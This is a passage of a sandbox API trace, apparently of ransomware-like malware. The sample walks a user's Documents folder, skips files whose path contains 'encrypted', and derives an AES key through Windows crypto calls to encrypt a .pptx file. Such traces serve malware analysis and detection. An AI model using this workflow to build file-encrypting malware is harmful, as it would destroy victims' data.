nFileSizeHigh=0x0, nFileSizeLow=0x70c8, dwReserved0=0x0, dwReserved1=0x777648, cFileName="H3Wz1PxDd.pptx", cAlternateFileName="H3WZ1P~1.PPT")) returned 0x7c20c0 [0033.026] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0033.026] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H3Wz1PxDd.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.026] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H3Wz1PxDd.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.026] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H3Wz1PxDd.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.026] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H3Wz1PxDd.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.026] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H3Wz1PxDd.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.026] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\H3Wz1PxDd.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\H3Wz1PxDd.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\H3Wz1PxDd.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\H3Wz1PxDd.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\H3Wz1PxDd.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\H3Wz1PxDd.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\H3Wz1PxDd.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\H3Wz1PxDd.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\H3Wz1PxDd.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\H3Wz1PxDd.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\H3Wz1PxDd.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\H3Wz1PxDd.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\H3Wz1PxDd.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\H3Wz1PxDd.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\H3Wz1PxDd.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\H3Wz1PxDd.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\H3Wz1PxDd.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\H3Wz1PxDd.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\H3Wz1PxDd.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\H3Wz1PxDd.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\H3Wz1PxDd.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\H3Wz1PxDd.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\H3Wz1PxDd.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\H3Wz1PxDd.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\H3Wz1PxDd.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\H3Wz1PxDd.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\H3Wz1PxDd.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\H3Wz1PxDd.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\H3Wz1PxDd.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\H3Wz1PxDd.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\H3Wz1PxDd.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\H3Wz1PxDd.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\H3Wz1PxDd.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\H3Wz1PxDd.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\H3Wz1PxDd.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\H3Wz1PxDd.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="H3Wz1PxDd.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3Wz1PxDd.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Wz1PxDd.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z1PxDd.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1PxDd.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PxDd.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xDd.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.028] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0033.028] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0033.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0033.028] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H3Wz1PxDd.pptx", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbbb0c630, ftCreationTime.dwHighDateTime=0x1d59cf6, ftLastAccessTime.dwLowDateTime=0x859ca230, ftLastAccessTime.dwHighDateTime=0x1d58c43, ftLastWriteTime.dwLowDateTime=0x859ca230, ftLastWriteTime.dwHighDateTime=0x1d58c43, nFileSizeHigh=0x0, nFileSizeLow=0x70c8, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="H3Wz1PxDd.pptx", cAlternateFileName="H3WZ1P~1.PPT")) returned 0x7c2100 [0033.028] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0033.028] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0033.028] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.028] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0033.028] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0033.028] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.028] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.029] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0033.029] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0033.029] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0033.029] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0033.029] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0033.030] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.030] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0033.030] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.030] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0033.030] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.030] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0033.030] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0033.030] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0033.030] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.030] CryptHashData (hHash=0x7c2240, pbData=0x7c7758, dwDataLen=0x100, dwFlags=0x1) returned 1 [0033.030] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0033.030] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0033.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0033.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0033.030] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.031] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2280) returned 1 [0033.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0033.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0033.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0033.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0033.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0033.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0033.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0033.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0033.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0033.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0033.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0033.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0033.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0033.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0033.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0033.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0033.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0033.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0033.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0033.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0033.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0033.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0033.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0033.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0033.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0033.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0033.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0033.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0033.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0033.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0033.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0033.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0033.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0033.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0033.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0033.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0033.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0033.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0033.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0033.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0033.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0033.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0033.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0033.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0033.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0033.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0033.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0033.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0033.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0033.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0033.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0033.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0033.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0033.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0033.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0033.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0033.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0033.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0033.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0033.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0033.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0033.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0033.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0033.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0033.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0033.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0033.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0033.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0033.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0033.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0033.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0033.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0033.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0033.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0033.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0033.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0033.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0033.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac350 | out: hHeap=0x770000) returned 1 [0033.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae9c8 | out: hHeap=0x770000) returned 1 [0033.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0033.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0033.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0033.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae9a8 | out: hHeap=0x770000) returned 1 [0033.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0033.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0033.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0033.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0033.033] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0033.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8898e0 [0033.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0033.033] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0033.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0033.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0033.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0033.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0033.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0033.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0033.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0033.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0033.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0033.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0033.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0033.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0033.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0033.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0033.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0033.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0033.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0033.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 